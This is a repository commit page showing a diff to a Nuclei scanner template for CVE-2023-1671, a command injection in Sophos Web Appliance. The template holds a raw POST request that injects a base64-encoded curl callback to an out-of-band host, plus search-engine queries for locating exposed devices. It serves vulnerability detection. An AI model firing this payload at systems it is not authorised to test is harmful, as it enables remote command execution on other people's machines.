daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added matcher

patch-1
Dhiyaneshwaran 2023-04-27 22:43:18 +05:30
parent d9d9909cd0
commit 19d687cbfe
1 changed files with 9 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
cves/2023/CVE-2023-1671.yaml
View File

@ -15,12 +15,12 @@ info:
cve-id: CVE-2023-1671 cve-id: CVE-2023-1671
cwe-id: CWE-77 cwe-id: CWE-77
metadata: metadata:
verified: "true"
fofa-query: title="Sophos Web Appliance" fofa-query: title="Sophos Web Appliance"
shodan-query: title:"Sophos Web Appliance" shodan-query: title:"Sophos Web Appliance"
verified: "true"
tags: cve,cve2023,rce,sophos tags: cve,cve2023,rce,sophos
requests: http:
- raw: - raw:
- | - |
POST /index.php?c=blocked&action=continue HTTP/1.1 POST /index.php?c=blocked&action=continue HTTP/1.1
@ -28,10 +28,15 @@ requests:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
User-Agent: curl/7.86.0 User-Agent: curl/7.86.0
args_reason=filetypewarn&url=1671&filetype=11412&user=15824&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}} args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}
matchers: matchers:
- type: word - type: word
part: interactsh_protocol part: interactsh_protocol
words: words:
- "http" - "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"